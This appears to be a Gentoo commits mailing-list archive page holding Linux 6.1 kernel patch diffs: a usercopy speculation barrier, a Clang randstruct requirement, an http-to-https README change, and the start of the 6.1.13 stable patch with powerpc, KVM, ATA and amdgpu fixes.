+index 1505a52f23a01..d29fe29c68494 100644
+--- a/lib/usercopy.c
++++ b/lib/usercopy.c
+@@ -3,6 +3,7 @@
+ #include <linux/fault-inject-usercopy.h>
+ #include <linux/instrumented.h>
+ #include <linux/uaccess.h>
++#include <linux/nospec.h>
+ 
+ /* out-of-line parts */
+ 
+@@ -12,6 +13,12 @@ unsigned long _copy_from_user(void *to, const void __user *from, unsigned long n
+ 	unsigned long res = n;
+ 	might_fault();
+ 	if (!should_fail_usercopy() && likely(access_ok(from, n))) {
++		/*
++		 * Ensure that bad access_ok() speculation will not
++		 * lead to nasty side effects *after* the copy is
++		 * finished:
++		 */
++		barrier_nospec();
+ 		instrument_copy_from_user_before(to, from, n);
+ 		res = raw_copy_from_user(to, from, n);
+ 		instrument_copy_from_user_after(to, from, n, res);
+diff --git a/scripts/head-object-list.txt b/scripts/head-object-list.txt
+index b16326a92c458..b074134cfac21 100644
+--- a/scripts/head-object-list.txt
++++ b/scripts/head-object-list.txt
+@@ -15,7 +15,6 @@ arch/alpha/kernel/head.o
+ arch/arc/kernel/head.o
+ arch/arm/kernel/head-nommu.o
+ arch/arm/kernel/head.o
+-arch/arm64/kernel/head.o
+ arch/csky/kernel/head.o
+ arch/hexagon/kernel/head.o
+ arch/ia64/kernel/head.o
+@@ -39,7 +38,6 @@ arch/powerpc/kernel/entry_64.o
+ arch/powerpc/kernel/fpu.o
+ arch/powerpc/kernel/vector.o
+ arch/powerpc/kernel/prom_init.o
+-arch/riscv/kernel/head.o
+ arch/s390/kernel/head64.o
+ arch/sh/kernel/head_32.o
+ arch/sparc/kernel/head_32.o
+diff --git a/security/Kconfig.hardening b/security/Kconfig.hardening
+index 53baa95cb644f..0f295961e7736 100644
+--- a/security/Kconfig.hardening
++++ b/security/Kconfig.hardening
+@@ -281,6 +281,9 @@ endmenu
+ 
+ config CC_HAS_RANDSTRUCT
+ 	def_bool $(cc-option,-frandomize-layout-seed-file=/dev/null)
++	# Randstruct was first added in Clang 15, but it isn't safe to use until
++	# Clang 16 due to https://github.com/llvm/llvm-project/issues/60349
++	depends on !CC_IS_CLANG || CLANG_VERSION >= 160000
+ 
+ choice
+ 	prompt "Randomize layout of sensitive kernel structures"
+diff --git a/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c b/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c
+index 2a5727188c8d3..0668ec542cccd 100644
+--- a/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c
++++ b/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c
+@@ -428,6 +428,7 @@ static void *juggle_shinfo_state(void *arg)
+ int main(int argc, char *argv[])
+ {
+ 	struct timespec min_ts, max_ts, vm_ts;
++	struct kvm_xen_hvm_attr evt_reset;
+ 	struct kvm_vm *vm;
+ 	pthread_t thread;
+ 	bool verbose;
+@@ -942,6 +943,10 @@ int main(int argc, char *argv[])
+ 	}
+ 
+  done:
++	evt_reset.type = KVM_XEN_ATTR_TYPE_EVTCHN;
++	evt_reset.u.evtchn.flags = KVM_XEN_EVTCHN_RESET;
++	vm_ioctl(vm, KVM_XEN_HVM_SET_ATTR, &evt_reset);
++
+ 	alarm(0);
+ 	clock_gettime(CLOCK_REALTIME, &max_ts);
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-24  3:03 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-02-24  3:03 UTC (permalink / raw
  To: gentoo-commits

commit:     5ae3ab31650bb433a32d16f5f1a157d0013400a3
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Fri Feb 24 02:56:16 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Fri Feb 24 02:58:32 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5ae3ab31

0000_README: use https:// instead of http:// by default

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README | 26 +++++++++++++-------------
 1 file changed, 13 insertions(+), 13 deletions(-)

diff --git a/0000_README b/0000_README
index 8acd931c..dee78b52 100644
--- a/0000_README
+++ b/0000_README
@@ -44,55 +44,55 @@ Individual Patch Descriptions:
 --------------------------------------------------------------------------
 
 Patch:  1000_linux-6.1.1.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.1
 
 Patch:  1001_linux-6.1.2.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.2
 
 Patch:  1002_linux-6.1.3.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.3
 
 Patch:  1003_linux-6.1.4.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.4
 
 Patch:  1004_linux-6.1.5.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.5
 
 Patch:  1005_linux-6.1.6.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.6
 
 Patch:  1006_linux-6.1.7.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.7
 
 Patch:  1007_linux-6.1.8.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.8
 
 Patch:  1008_linux-6.1.9.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.9
 
 Patch:  1009_linux-6.1.10.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.10
 
 Patch:  1010_linux-6.1.11.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.11
 
 Patch:  1011_linux-6.1.12.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.12
 
 Patch:  1012_linux-6.1.13.patch
-From:   http://www.kernel.org
+From:   https://www.kernel.org
 Desc:   Linux 6.1.13
 
 Patch:  1500_XATTR_USER_PREFIX.patch


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-22 13:46 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-02-22 13:46 UTC (permalink / raw
  To: gentoo-commits

commit:     0925121469bc5673fc8b3c65d401bf29ddb2aa59
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Feb 22 13:03:12 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Feb 22 13:03:12 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=09251214

Linux patch 6.1.13

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1012_linux-6.1.13.patch | 4572 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4576 insertions(+)

diff --git a/0000_README b/0000_README
index 92068c30..8acd931c 100644
--- a/0000_README
+++ b/0000_README
@@ -91,6 +91,10 @@ Patch:  1011_linux-6.1.12.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.12
 
+Patch:  1012_linux-6.1.13.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.13
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1012_linux-6.1.13.patch b/1012_linux-6.1.13.patch
new file mode 100644
index 00000000..3534e40f
--- /dev/null
+++ b/1012_linux-6.1.13.patch
@@ -0,0 +1,4572 @@
+diff --git a/Makefile b/Makefile
+index 23390805e5217..e51356b982f90 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 12
++SUBLEVEL = 13
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/powerpc/include/asm/hw_irq.h b/arch/powerpc/include/asm/hw_irq.h
+index 0b7d01d408ac8..eb6d094083fd6 100644
+--- a/arch/powerpc/include/asm/hw_irq.h
++++ b/arch/powerpc/include/asm/hw_irq.h
+@@ -173,6 +173,15 @@ static inline notrace unsigned long irq_soft_mask_or_return(unsigned long mask)
+ 	return flags;
+ }
+ 
++static inline notrace unsigned long irq_soft_mask_andc_return(unsigned long mask)
++{
++	unsigned long flags = irq_soft_mask_return();
++
++	irq_soft_mask_set(flags & ~mask);
++
++	return flags;
++}
++
+ static inline unsigned long arch_local_save_flags(void)
+ {
+ 	return irq_soft_mask_return();
+@@ -331,10 +340,11 @@ bool power_pmu_wants_prompt_pmi(void);
+  * is a different soft-masked interrupt pending that requires hard
+  * masking.
+  */
+-static inline bool should_hard_irq_enable(void)
++static inline bool should_hard_irq_enable(struct pt_regs *regs)
+ {
+ 	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
+-		WARN_ON(irq_soft_mask_return() == IRQS_ENABLED);
++		WARN_ON(irq_soft_mask_return() != IRQS_ALL_DISABLED);
++		WARN_ON(!(get_paca()->irq_happened & PACA_IRQ_HARD_DIS));
+ 		WARN_ON(mfmsr() & MSR_EE);
+ 	}
+ 
+@@ -347,8 +357,17 @@ static inline bool should_hard_irq_enable(void)
+ 	 *
+ 	 * TODO: Add test for 64e
+ 	 */
+-	if (IS_ENABLED(CONFIG_PPC_BOOK3S_64) && !power_pmu_wants_prompt_pmi())
+-		return false;
++	if (IS_ENABLED(CONFIG_PPC_BOOK3S_64)) {
++		if (!power_pmu_wants_prompt_pmi())
++			return false;
++		/*
++		 * If PMIs are disabled then IRQs should be disabled as well,
++		 * so we shouldn't see this condition, check for it just in
++		 * case because we are about to enable PMIs.
++		 */
++		if (WARN_ON_ONCE(regs->softe & IRQS_PMI_DISABLED))
++			return false;
++	}
+ 
+ 	if (get_paca()->irq_happened & PACA_IRQ_MUST_HARD_MASK)
+ 		return false;
+@@ -358,18 +377,16 @@ static inline bool should_hard_irq_enable(void)
+ 
+ /*
+  * Do the hard enabling, only call this if should_hard_irq_enable is true.
++ * This allows PMI interrupts to profile irq handlers.
+  */
+ static inline void do_hard_irq_enable(void)
+ {
+-	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
+-		WARN_ON(irq_soft_mask_return() == IRQS_ENABLED);
+-		WARN_ON(get_paca()->irq_happened & PACA_IRQ_MUST_HARD_MASK);
+-		WARN_ON(mfmsr() & MSR_EE);
+-	}
+ 	/*
+-	 * This allows PMI interrupts (and watchdog soft-NMIs) through.
+-	 * There is no other reason to enable this way.
++	 * Asynch interrupts come in with IRQS_ALL_DISABLED,
++	 * PACA_IRQ_HARD_DIS, and MSR[EE]=0.
+ 	 */
++	if (IS_ENABLED(CONFIG_PPC_BOOK3S_64))
++		irq_soft_mask_andc_return(IRQS_PMI_DISABLED);
+ 	get_paca()->irq_happened &= ~PACA_IRQ_HARD_DIS;
+ 	__hard_irq_enable();
+ }
+@@ -452,7 +469,7 @@ static inline bool arch_irq_disabled_regs(struct pt_regs *regs)
+ 	return !(regs->msr & MSR_EE);
+ }
+ 
+-static __always_inline bool should_hard_irq_enable(void)
++static __always_inline bool should_hard_irq_enable(struct pt_regs *regs)
+ {
+ 	return false;
+ }
+diff --git a/arch/powerpc/kernel/dbell.c b/arch/powerpc/kernel/dbell.c
+index f55c6fb34a3a0..5712dd846263c 100644
+--- a/arch/powerpc/kernel/dbell.c
++++ b/arch/powerpc/kernel/dbell.c
+@@ -27,7 +27,7 @@ DEFINE_INTERRUPT_HANDLER_ASYNC(doorbell_exception)
+ 
+ 	ppc_msgsync();
+ 
+-	if (should_hard_irq_enable())
++	if (should_hard_irq_enable(regs))
+ 		do_hard_irq_enable();
+ 
+ 	kvmppc_clear_host_ipi(smp_processor_id());
+diff --git a/arch/powerpc/kernel/irq.c b/arch/powerpc/kernel/irq.c
+index 9ede61a5a469e..55142ff649f3f 100644
+--- a/arch/powerpc/kernel/irq.c
++++ b/arch/powerpc/kernel/irq.c
+@@ -238,7 +238,7 @@ static void __do_irq(struct pt_regs *regs, unsigned long oldsp)
+ 	irq = static_call(ppc_get_irq)();
+ 
+ 	/* We can hard enable interrupts now to allow perf interrupts */
+-	if (should_hard_irq_enable())
++	if (should_hard_irq_enable(regs))
+ 		do_hard_irq_enable();
+ 
+ 	/* And finally process it */
+diff --git a/arch/powerpc/kernel/time.c b/arch/powerpc/kernel/time.c
+index a2ab397065c66..f157552d79b38 100644
+--- a/arch/powerpc/kernel/time.c
++++ b/arch/powerpc/kernel/time.c
+@@ -533,7 +533,7 @@ DEFINE_INTERRUPT_HANDLER_ASYNC(timer_interrupt)
+ 	}
+ 
+ 	/* Conditionally hard-enable interrupts. */
+-	if (should_hard_irq_enable()) {
++	if (should_hard_irq_enable(regs)) {
+ 		/*
+ 		 * Ensure a positive value is written to the decrementer, or
+ 		 * else some CPUs will continue to take decrementer exceptions.
+diff --git a/arch/s390/boot/decompressor.c b/arch/s390/boot/decompressor.c
+index e27c2140d6206..623f6775d01d7 100644
+--- a/arch/s390/boot/decompressor.c
++++ b/arch/s390/boot/decompressor.c
+@@ -80,6 +80,6 @@ void *decompress_kernel(void)
+ 	void *output = (void *)decompress_offset;
+ 
+ 	__decompress(_compressed_start, _compressed_end - _compressed_start,
+-		     NULL, NULL, output, 0, NULL, error);
++		     NULL, NULL, output, vmlinux.image_size, NULL, error);
+ 	return output;
+ }
+diff --git a/arch/x86/events/core.c b/arch/x86/events/core.c
+index b30b8bbcd1e22..30fb4931d3871 100644
+--- a/arch/x86/events/core.c
++++ b/arch/x86/events/core.c
+@@ -2994,17 +2994,19 @@ unsigned long perf_misc_flags(struct pt_regs *regs)
+ 
+ void perf_get_x86_pmu_capability(struct x86_pmu_capability *cap)
+ {
+-	if (!x86_pmu_initialized()) {
++	/* This API doesn't currently support enumerating hybrid PMUs. */
++	if (WARN_ON_ONCE(cpu_feature_enabled(X86_FEATURE_HYBRID_CPU)) ||
++	    !x86_pmu_initialized()) {
+ 		memset(cap, 0, sizeof(*cap));
+ 		return;
+ 	}
+ 
+-	cap->version		= x86_pmu.version;
+ 	/*
+-	 * KVM doesn't support the hybrid PMU yet.
+-	 * Return the common value in global x86_pmu,
+-	 * which available for all cores.
++	 * Note, hybrid CPU models get tracked as having hybrid PMUs even when
++	 * all E-cores are disabled via BIOS.  When E-cores are disabled, the
++	 * base PMU holds the correct number of counters for P-cores.
+ 	 */
++	cap->version		= x86_pmu.version;
+ 	cap->num_counters_gp	= x86_pmu.num_counters;
+ 	cap->num_counters_fixed	= x86_pmu.num_counters_fixed;
+ 	cap->bit_width_gp	= x86_pmu.cntval_bits;
+diff --git a/arch/x86/kvm/pmu.h b/arch/x86/kvm/pmu.h
+index 5cc5721f260bf..c976490b75568 100644
+--- a/arch/x86/kvm/pmu.h
++++ b/arch/x86/kvm/pmu.h
+@@ -164,15 +164,27 @@ static inline void kvm_init_pmu_capability(void)
+ {
+ 	bool is_intel = boot_cpu_data.x86_vendor == X86_VENDOR_INTEL;
+ 
+-	perf_get_x86_pmu_capability(&kvm_pmu_cap);
+-
+-	 /*
+-	  * For Intel, only support guest architectural pmu
+-	  * on a host with architectural pmu.
+-	  */
+-	if ((is_intel && !kvm_pmu_cap.version) || !kvm_pmu_cap.num_counters_gp)
++	/*
++	 * Hybrid PMUs don't play nice with virtualization without careful
++	 * configuration by userspace, and KVM's APIs for reporting supported
++	 * vPMU features do not account for hybrid PMUs.  Disable vPMU support
++	 * for hybrid PMUs until KVM gains a way to let userspace opt-in.
++	 */
++	if (cpu_feature_enabled(X86_FEATURE_HYBRID_CPU))
+ 		enable_pmu = false;
+ 
++	if (enable_pmu) {
++		perf_get_x86_pmu_capability(&kvm_pmu_cap);
++
++		/*
++		 * For Intel, only support guest architectural pmu
++		 * on a host with architectural pmu.
++		 */
++		if ((is_intel && !kvm_pmu_cap.version) ||
++		    !kvm_pmu_cap.num_counters_gp)
++			enable_pmu = false;
++	}
++
+ 	if (!enable_pmu) {
+ 		memset(&kvm_pmu_cap, 0, sizeof(kvm_pmu_cap));
+ 		return;
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index a0c35b948c30b..05ca303d7fd98 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -5250,12 +5250,11 @@ static void kvm_vcpu_ioctl_x86_get_debugregs(struct kvm_vcpu *vcpu,
+ {
+ 	unsigned long val;
+ 
++	memset(dbgregs, 0, sizeof(*dbgregs));
+ 	memcpy(dbgregs->db, vcpu->arch.db, sizeof(vcpu->arch.db));
+ 	kvm_get_dr(vcpu, 6, &val);
+ 	dbgregs->dr6 = val;
+ 	dbgregs->dr7 = vcpu->arch.dr7;
+-	dbgregs->flags = 0;
+-	memset(&dbgregs->reserved, 0, sizeof(dbgregs->reserved));
+ }
+ 
+ static int kvm_vcpu_ioctl_x86_set_debugregs(struct kvm_vcpu *vcpu,
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 53ab2306da009..17bb0d8158ca0 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -422,6 +422,7 @@ static const struct pci_device_id ahci_pci_tbl[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x34d3), board_ahci_low_power }, /* Ice Lake LP AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d3), board_ahci_low_power }, /* Comet Lake PCH-U AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d7), board_ahci_low_power }, /* Comet Lake PCH RAID */
++	{ PCI_VDEVICE(INTEL, 0xa0d3), board_ahci_low_power }, /* Tiger Lake UP{3,4} AHCI */
+ 
+ 	/* JMicron 360/1/3/5/6, match class to avoid IDE function */
+ 	{ PCI_VENDOR_ID_JMICRON, PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID,
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 26a75f5cce95b..a5ea144722fa3 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -4044,6 +4044,9 @@ static const struct ata_blacklist_entry ata_device_blacklist [] = {
+ 	{ "Samsung SSD 870*",		NULL,	ATA_HORKAGE_NO_NCQ_TRIM |
+ 						ATA_HORKAGE_ZERO_AFTER_TRIM |
+ 						ATA_HORKAGE_NO_NCQ_ON_ATI },
++	{ "SAMSUNG*MZ7LH*",		NULL,	ATA_HORKAGE_NO_NCQ_TRIM |
++						ATA_HORKAGE_ZERO_AFTER_TRIM |
++						ATA_HORKAGE_NO_NCQ_ON_ATI, },
+ 	{ "FCCT*M500*",			NULL,	ATA_HORKAGE_NO_NCQ_TRIM |
+ 						ATA_HORKAGE_ZERO_AFTER_TRIM },
+ 
+diff --git a/drivers/gpio/gpio-sim.c b/drivers/gpio/gpio-sim.c
+index 1020c2feb2496..cff68f31a09fd 100644
+--- a/drivers/gpio/gpio-sim.c
++++ b/drivers/gpio/gpio-sim.c
+@@ -732,7 +732,7 @@ static void gpio_sim_remove_hogs(struct gpio_sim_device *dev)
+ 
+ 	gpiod_remove_hogs(dev->hogs);
+ 
+-	for (hog = dev->hogs; !hog->chip_label; hog++) {
++	for (hog = dev->hogs; hog->chip_label; hog++) {
+ 		kfree(hog->chip_label);
+ 		kfree(hog->line_name);
+ 	}
+diff --git a/drivers/gpu/drm/Kconfig b/drivers/gpu/drm/Kconfig
+index 34f5a092c99e7..f30f99166531f 100644
+--- a/drivers/gpu/drm/Kconfig
++++ b/drivers/gpu/drm/Kconfig
+@@ -53,7 +53,8 @@ config DRM_DEBUG_MM
+ 
+ config DRM_USE_DYNAMIC_DEBUG
+ 	bool "use dynamic debug to implement drm.debug"
+-	default y
++	default n
++	depends on BROKEN
+ 	depends on DRM
+ 	depends on DYNAMIC_DEBUG || DYNAMIC_DEBUG_CORE
+ 	depends on JUMP_LABEL
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 8f83d5b6ceaad..a21b3f66fd708 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4248,6 +4248,9 @@ int amdgpu_device_resume(struct drm_device *dev, bool fbcon)
+ #endif
+ 	adev->in_suspend = false;
+ 
++	if (adev->enable_mes)
++		amdgpu_mes_self_test(adev);
++
+ 	if (amdgpu_acpi_smart_shift_update(dev, AMDGPU_SS_DEV_D0))
+ 		DRM_WARN("smart shift update failed\n");
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index 32b0ea8757fa5..6f0e389be5f6a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -1339,7 +1339,7 @@ static int mes_v11_0_late_init(void *handle)
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
+ 	/* it's only intended for use in mes_self_test case, not for s0ix and reset */
+-	if (!amdgpu_in_reset(adev) && !adev->in_s0ix &&
++	if (!amdgpu_in_reset(adev) && !adev->in_s0ix && !adev->in_suspend &&
+ 	    (adev->ip_versions[GC_HWIP][0] != IP_VERSION(11, 0, 3)))
+ 		amdgpu_mes_self_test(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 9bc9852b9cda9..230e15fed755c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -643,7 +643,8 @@ static int soc21_common_early_init(void *handle)
+ 			AMD_CG_SUPPORT_GFX_CGCG |
+ 			AMD_CG_SUPPORT_GFX_CGLS |
+ 			AMD_CG_SUPPORT_REPEATER_FGCG |
+-			AMD_CG_SUPPORT_GFX_MGCG;
++			AMD_CG_SUPPORT_GFX_MGCG |
++			AMD_CG_SUPPORT_HDP_SD;
+ 		adev->pg_flags = AMD_PG_SUPPORT_VCN |
+ 			AMD_PG_SUPPORT_VCN_DPG |
+ 			AMD_PG_SUPPORT_JPEG;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 988b1c947aefc..e9c4f22696c5c 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -4526,6 +4526,17 @@ DEVICE_ATTR_WO(s3_debug);
+ static int dm_early_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++	struct amdgpu_mode_info *mode_info = &adev->mode_info;
++	struct atom_context *ctx = mode_info->atom_context;
++	int index = GetIndexIntoMasterTable(DATA, Object_Header);
++	u16 data_offset;
++
++	/* if there is no object header, skip DM */
++	if (!amdgpu_atom_parse_data_header(ctx, index, NULL, NULL, NULL, &data_offset)) {
++		adev->harvest_ip_mask |= AMD_HARVEST_IP_DMU_MASK;
++		dev_info(adev->dev, "No object header, skipping DM\n");
++		return -ENOENT;
++	}
+ 
+ 	switch (adev->asic_type) {
+ #if defined(CONFIG_DRM_AMD_DC_SI)
+@@ -9545,7 +9556,11 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 	 * `dcn10_can_pipe_disable_cursor`). By now, all modified planes are in
+ 	 * atomic state, so call drm helper to normalize zpos.
+ 	 */
+-	drm_atomic_normalize_zpos(dev, state);
++	ret = drm_atomic_normalize_zpos(dev, state);
++	if (ret) {
++		drm_dbg(dev, "drm_atomic_normalize_zpos() failed\n");
++		goto fail;
++	}
+ 
+ 	/* Remove exiting planes if they are modified */
+ 	for_each_oldnew_plane_in_state_reverse(state, plane, old_plane_state, new_plane_state, i) {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 9066c511a0529..c80c8c8f51e97 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -871,8 +871,9 @@ static const struct dc_plane_cap plane_cap = {
+ 	},
+ 
+ 	// 6:1 downscaling ratio: 1000/6 = 166.666
++	// 4:1 downscaling ratio for ARGB888 to prevent underflow during P010 playback: 1000/4 = 250
+ 	.max_downscale_factor = {
+-			.argb8888 = 167,
++			.argb8888 = 250,
+ 			.nv12 = 167,
+ 			.fp16 = 167
+ 	},
+@@ -1755,7 +1756,7 @@ static bool dcn314_resource_construct(
+ 	pool->base.underlay_pipe_index = NO_UNDERLAY_PIPE;
+ 	pool->base.pipe_count = pool->base.res_cap->num_timing_generator;
+ 	pool->base.mpcc_count = pool->base.res_cap->num_timing_generator;
+-	dc->caps.max_downscale_ratio = 600;
++	dc->caps.max_downscale_ratio = 400;
+ 	dc->caps.i2c_speed_in_khz = 100;
+ 	dc->caps.i2c_speed_in_khz_hdcp = 100;
+ 	dc->caps.max_cursor_size = 256;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_init.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_init.c
+index 45a949ba6f3f3..7b7f0e6b2a2ff 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_init.c
+@@ -94,7 +94,7 @@ static const struct hw_sequencer_funcs dcn32_funcs = {
+ 	.get_vupdate_offset_from_vsync = dcn10_get_vupdate_offset_from_vsync,
+ 	.calc_vupdate_position = dcn10_calc_vupdate_position,
+ 	.apply_idle_power_optimizations = dcn32_apply_idle_power_optimizations,
+-	.does_plane_fit_in_mall = dcn30_does_plane_fit_in_mall,
++	.does_plane_fit_in_mall = NULL,
+ 	.set_backlight_level = dcn21_set_backlight_level,
+ 	.set_abm_immediate_disable = dcn21_set_abm_immediate_disable,
+ 	.hardware_release = dcn30_hardware_release,
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+index 0d12fd079cd61..3afd3c80e6da8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+@@ -3184,7 +3184,7 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 		} else {
+ 			v->MIN_DST_Y_NEXT_START[k] = v->VTotal[k] - v->VFrontPorch[k] + v->VTotal[k] - v->VActive[k] - v->VStartup[k];
+ 		}
+-		v->MIN_DST_Y_NEXT_START[k] += dml_floor(4.0 * v->TSetup[k] / (double)v->HTotal[k] / v->PixelClock[k], 1.0) / 4.0;
++		v->MIN_DST_Y_NEXT_START[k] += dml_floor(4.0 * v->TSetup[k] / ((double)v->HTotal[k] / v->PixelClock[k]), 1.0) / 4.0;
+ 		if (((v->VUpdateOffsetPix[k] + v->VUpdateWidthPix[k] + v->VReadyOffsetPix[k]) / v->HTotal[k])
+ 				<= (isInterlaceTiming ?
+ 						dml_floor((v->VTotal[k] - v->VActive[k] - v->VFrontPorch[k] - v->VStartup[k]) / 2.0, 1.0) :
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+index 4a122925c3ae9..92c18bfb98b3b 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+@@ -532,6 +532,9 @@ enum dmub_status dmub_srv_hw_init(struct dmub_srv *dmub,
+ 	if (dmub->hw_funcs.reset)
+ 		dmub->hw_funcs.reset(dmub);
+ 
++	/* reset the cache of the last wptr as well now that hw is reset */
++	dmub->inbox1_last_wptr = 0;
++
+ 	cw0.offset.quad_part = inst_fb->gpu_addr;
+ 	cw0.region.base = DMUB_CW0_BASE;
+ 	cw0.region.top = cw0.region.base + inst_fb->size - 1;
+@@ -649,6 +652,15 @@ enum dmub_status dmub_srv_hw_reset(struct dmub_srv *dmub)
+ 	if (dmub->hw_funcs.reset)
+ 		dmub->hw_funcs.reset(dmub);
+ 
++	/* mailboxes have been reset in hw, so reset the sw state as well */
++	dmub->inbox1_last_wptr = 0;
++	dmub->inbox1_rb.wrpt = 0;
++	dmub->inbox1_rb.rptr = 0;
++	dmub->outbox0_rb.wrpt = 0;
++	dmub->outbox0_rb.rptr = 0;
++	dmub->outbox1_rb.wrpt = 0;
++	dmub->outbox1_rb.rptr = 0;
++
+ 	dmub->hw_init = false;
+ 
+ 	return DMUB_STATUS_OK;
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 41635694e5216..2f3e239e623dc 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -2009,14 +2009,16 @@ static int default_attr_update(struct amdgpu_device *adev, struct amdgpu_device_
